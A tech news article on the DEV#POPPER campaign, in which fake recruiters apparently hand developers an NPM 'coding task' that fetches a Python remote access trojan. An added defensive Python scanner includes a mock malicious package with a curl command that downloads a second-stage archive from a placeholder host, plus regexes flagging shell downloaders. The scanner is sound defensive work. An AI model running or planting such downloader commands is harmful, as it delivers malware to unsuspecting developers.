Fake job interviews trap developers with a back door


Mélina LOUPIA

April 27, 2024 at 6:47 p.m.


A back door is hidden in a fake job interview for developers © RossHelen / Shutterstock


Web developers are the latest target of hackers, probably North Korean, who pose as recruiters and plant a Python-based remote access trojan (RAT) inside a fake coding test.

DEV#POPPER is the rather cynical name given by researchers at Securonix Threat Research (STR) to this new malware campaign, which is delivered through a back door. New because it is recent: the ruse itself is not, and it is what put STR on the trail of North Korean hackers.

It is through a fake job interview that equally fake recruiters lure their victims, software developers. They send them a coding task that hides a back door, through which they introduce RAT malware built on an obfuscated Python script. The approach is reminiscent of methods often used by the infamous Lazarus Group, also from North Korea.

Similarities to other North Korean malware campaigns

DEV#POPPER could well be yet another malware campaign launched by North Korea. Without claiming irrefutable evidence, STR researchers compared it with similar past North Korean attacks.

The best known of these, called “Operation Dream Job”, was launched in 2021 by the Lazarus Group. It targeted hundreds of job seekers and, with fake offers, tried to steal their personal information and login credentials. The process is simple: the hackers send phishing emails to victims that use real company names and logos.

The emails are malicious and contain links to fake company websites on which the victims, trusting the offer, enter their personal data, which the hackers then steal. This technique also strongly resembles the one used by the hackers who deployed a new version of KaolinRAT, and who are linked to the Lazarus Group.

Operation Dream Job belongs to a set of Lazarus campaigns, as do “Operation In(ter)ception” and “Operation North Star”. Concluding that DEV#POPPER is the latest addition to the list of Lazarus Group campaigns, or those of other North Korean operators, was therefore a natural step.

Hackers use fake coding task to trick developers © Habichtland / Shutterstock


The lure of the fake coding exercise to deploy DEV#POPPER

In most cases, cybercriminals use the vulnerable state of a country, a sector or a group of people as leverage for their traps. In the case of DEV#POPPER, they are exploiting the job crisis affecting developers all over the world.

In short, the hackers pose as employers looking to hire software developers. During the interview, they ask candidates to download and run a coding task from a file supposedly hosted on GitHub. The downloaded file, a ZIP archive, works like a set of Russian dolls. Inside is an NPM package containing a README.md and frontend and backend directories.

When the developer runs the NPM package, a hidden JavaScript file (“imageDetails.js”) located in the backend directory is triggered. It executes “curl” commands through the Node.js process to retrieve another archive (“p.zi”) from a remote server. This new archive contains the next stage of the payload, a camouflaged Python script (“npl”) that acts as a RAT.
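The infection chain above has a recognisable shape: a coding task that a candidate is expected to run, with a file in the package that spawns a shell downloader and fetches an archive from a remote host. As an added example, not code from the article or from Securonix, here is a small static triage script a developer or a security team could run over an unpacked "coding task" package before executing it. The sample package it inspects is constructed for this example and only mimics the layout described above (README, frontend/ and backend/ directories, a backend/imageDetails.js that curls a p.zi archive); the host example.invalid, the rule names and the weights are all assumptions.

```python
import json
import re
from dataclasses import dataclass

# Constructed sample of a "coding task" NPM package. It is NOT the DEV#POPPER
# archive, only an illustration shaped like the article's description: a README,
# frontend/ and backend/ directories, and a backend/imageDetails.js that uses
# Node's child_process to curl a second-stage archive (p.zi).
# example.invalid is a placeholder host, not a real server.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "coding-task",
                                "scripts": {"start": "node backend/server.js"}}),
    "README.md": "# Coding task\nRun `npm start`, then implement the TODOs.\n",
    "frontend/app.js": "export function render() { return '<h1>TODO</h1>'; }\n",
    "backend/server.js": ("const http = require('http');\n"
                          "require('./imageDetails');\n"
                          "http.createServer(() => {}).listen(3000);\n"),
    "backend/imageDetails.js": ("const { exec } = require('child_process');\n"
                                "exec('curl -s -o /tmp/p.zi http://example.invalid/p.zi');\n"),
}

# A benign package with the same layout, to show the rules do not fire on it.
CLEAN_PACKAGE = {
    "package.json": json.dumps({"name": "coding-task",
                                "scripts": {"start": "node backend/server.js"}}),
    "backend/server.js": ("const http = require('http');\n"
                          "http.createServer(() => {}).listen(3000);\n"),
    "frontend/app.js": "export function render() { return '<h1>TODO</h1>'; }\n",
}


@dataclass
class Finding:
    path: str
    rule: str
    evidence: str


# Each rule: (name, weight, regex). Weights are an assumption for this example.
JS_RULES = [
    ("child-process", 1, re.compile(r"require\(\s*['\"]child_process['\"]\s*\)|from\s+['\"]child_process['\"]")),
    ("shell-downloader", 2, re.compile(r"\b(curl|wget|certutil|Invoke-WebRequest)\b")),
    ("remote-archive", 2, re.compile(r"https?://[^\s'\"]+\.(?:zip|zi|tar|gz|7z|rar)\b", re.I)),
    ("dynamic-eval", 1, re.compile(r"\beval\s*\(|new\s+Function\s*\(")),
]
WEIGHTS = {name: w for name, w, _ in JS_RULES}
WEIGHTS["lifecycle-hook"] = 2   # runs on `npm install`, before the developer reads anything
WEIGHTS["stage-download"] = 3   # child_process and a downloader in the same file
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SUSPICIOUS_AT = 5               # assumed threshold


def scan_js(path, text):
    """Apply the regex rules to one JavaScript/TypeScript source file."""
    hits = []
    for name, _, rx in JS_RULES:
        m = rx.search(text)
        if m:
            hits.append(Finding(path, name, m.group(0)))
    names = {h.rule for h in hits}
    if {"child-process", "shell-downloader"} <= names:
        hits.append(Finding(path, "stage-download", "child_process + curl/wget in one file"))
    return hits


def scan_package_json(path, text):
    """Flag lifecycle scripts, which npm executes automatically on install."""
    try:
        data = json.loads(text)
    except ValueError:
        return [Finding(path, "unparseable-package-json", text[:40])]
    scripts = data.get("scripts") or {}
    return [Finding(path, "lifecycle-hook", f"{hook}: {scripts[hook]}")
            for hook in LIFECYCLE_HOOKS if hook in scripts]


def scan_package(files):
    """files: {relative path: contents} for an unpacked package (read from disk in practice)."""
    findings = []
    for path, text in sorted(files.items()):
        if path.endswith("package.json"):
            findings += scan_package_json(path, text)
        elif path.endswith((".js", ".mjs", ".cjs", ".ts")):
            findings += scan_js(path, text)
    return findings


def assess(files):
    """Return (verdict, score, findings); verdict is 'suspicious' or 'clean'."""
    findings = scan_package(files)
    score = sum(WEIGHTS.get(f.rule, 1) for f in findings)
    return ("suspicious" if score >= SUSPICIOUS_AT else "clean"), score, findings


if __name__ == "__main__":
    for label, pkg in (("sample", SAMPLE_PACKAGE), ("clean", CLEAN_PACKAGE)):
        verdict, score, findings = assess(pkg)
        print(f"{label}: {verdict} (score {score})")
        for f in findings:
            print(f"  {f.path}: {f.rule} -> {f.evidence}")
```

On the constructed sample, every finding lands on backend/imageDetails.js: the child_process import, the curl invocation, the archive URL, and the combined "stage-download" rule, which is the pattern the article describes. The benign package scores zero. A plain `npm start` script is deliberately not flagged, because a real coding task needs one; what matters is what the started file requires and executes, which is why the rules look at the JavaScript sources rather than only package.json. A regex scan like this is a first filter, not a verdict: obfuscated scripts can hide the strings it looks for, so the safer habit remains running any recruiter-supplied code only in a disposable virtual machine.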

A RAT is a multipurpose tool: it can stay permanently connected to control the computer, search for and steal specific files, execute remote commands to cause further damage, or install other malware. It can even steal data directly from sensitive folders and log what the user types on the keyboard to capture personal information.

The software development job market is highly competitive and puts job seekers under pressure, which makes them vulnerable. According to STR researchers, the fake recruitment scam is very effective because it exploits the developer’s trust when applying for a job. Refusing to do what the recruiter asks could jeopardize the job opportunity. Formidably effective.

Sources: Bleeping Computer, Securonix

Mélina LOUPIA

Ex-corporate journalist, the world of the web, networks, connected machines and everything that is written on the Internet whets my appetite. From the latest TikTok trend to the most liked reels, I come from the Facebook generation that still fascinates the internal war between Mac and PC. As a wise woman, the Internet, its tools, practices and regulation are among my favorite hobbies (that, lineart, knitting and bad jokes). My motto: to try it is to adopt it, but in complete safety.
